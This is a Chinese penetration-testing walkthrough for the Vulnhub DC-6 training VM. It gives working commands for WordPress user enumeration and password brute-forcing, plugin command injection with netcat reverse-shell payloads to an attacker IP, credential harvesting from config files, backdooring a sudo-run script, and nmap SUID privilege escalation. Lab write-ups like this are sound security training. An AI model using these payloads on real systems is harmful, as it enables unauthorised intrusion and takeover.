Vulnhub靶机DC系列-DC6
字数 1072 2025-08-15 21:33:22
DC-6 靶机渗透教学文档
靶场介绍
- 名称: DC-6
- 来源: Vulnhub (https://www.vulnhub.com/entry/dc-6,315/)
- 难度: 中等偏易,适合初学者
- 目标: 获取root权限并读取flag
- 技能要求: Linux命令行基础、基本渗透测试工具使用
- 环境: VMware虚拟机桥接模式
环境准备
- 下载并导入DC-6虚拟机
- 设置网络为桥接模式
- 发现靶机IP后,修改本地hosts文件:
(IP地址根据实际情况调整)192.168.3.34 wordy
信息收集
1. 发现靶机IP
使用nmap扫描本地网络:
nmap -sn 192.168.3.0/24
2. 端口扫描与服务识别
nmap -sV -p- 192.168.3.34
3. Web服务枚举
- 访问http://wordy (确保hosts已配置)
- 使用dirb扫描目录:
dirb http://wordy - 识别为WordPress站点
WordPress渗透
1. 用户枚举
使用wpscan枚举用户:
wpscan --url http://wordy --enumerate u
2. 密码爆破
根据页面提示构建密码字典:
cat /usr/share/wordlists/rockyou.txt | grep k01 > password.txt
使用wpscan爆破:
wpscan --url http://wordy --usernames mark --passwords password.txt
发现凭证:mark/helpdesk01
后台利用
- 使用mark/helpdesk01登录WordPress后台
- 检查插件漏洞(CVE-2018-15877)
- 通过命令注入获取反弹shell:
- 前端有长度限制,使用Burp Suite拦截修改请求
- 注入payload:
|nc -e /bin/bash <kali_ip> 4444 - 或:
||nc -e /bin/bash <kali_ip> 4444
权限提升
1. 初始shell处理
python -c 'import pty; pty.spawn("/bin/bash")'
2. 枚举系统用户
cat /etc/passwd | grep /bin/bash
3. 查找数据库凭证
检查WordPress配置文件:
cat /var/www/html/wordpress/wp-config.php
4. 横向移动
在mark目录下发现提示:
cat /home/mark/stuff/things-to-do.txt
发现凭证:graham/GSo7isUM1D4
切换到graham用户:
su graham
5. 利用sudo权限
检查graham的sudo权限:
sudo -l
发现可以以jens身份无密码执行/home/jens/backups.sh
6. 获取jens权限
- 修改backups.sh添加反弹shell命令:
echo "nc -e /bin/bash <kali_ip> 5555" >> /home/jens/backups.sh - 执行脚本:
sudo -u jens /home/jens/backups.sh - Kali监听5555端口获取jens的shell
7. 最终提权到root
-
检查SUID程序:
find / -perm -4000 2>/dev/null发现nmap具有SUID权限
-
利用nmap的交互模式提权:
nmap --interactive > !sh或使用nmap脚本:
echo 'os.execute("/bin/bash")' > /tmp/root.nse nmap --script=/tmp/root.nse
获取flag
提权到root后,在/root目录下查找flag文件:
cd /root
ls
cat *.txt
总结
- WordPress用户枚举与密码爆破
- 插件漏洞利用获取初始访问
- 凭证发现与横向移动
- sudo权限滥用
- SUID提权最终获取root权限
关键点:密码字典构建、命令注入绕过、sudo权限利用、nmap提权技术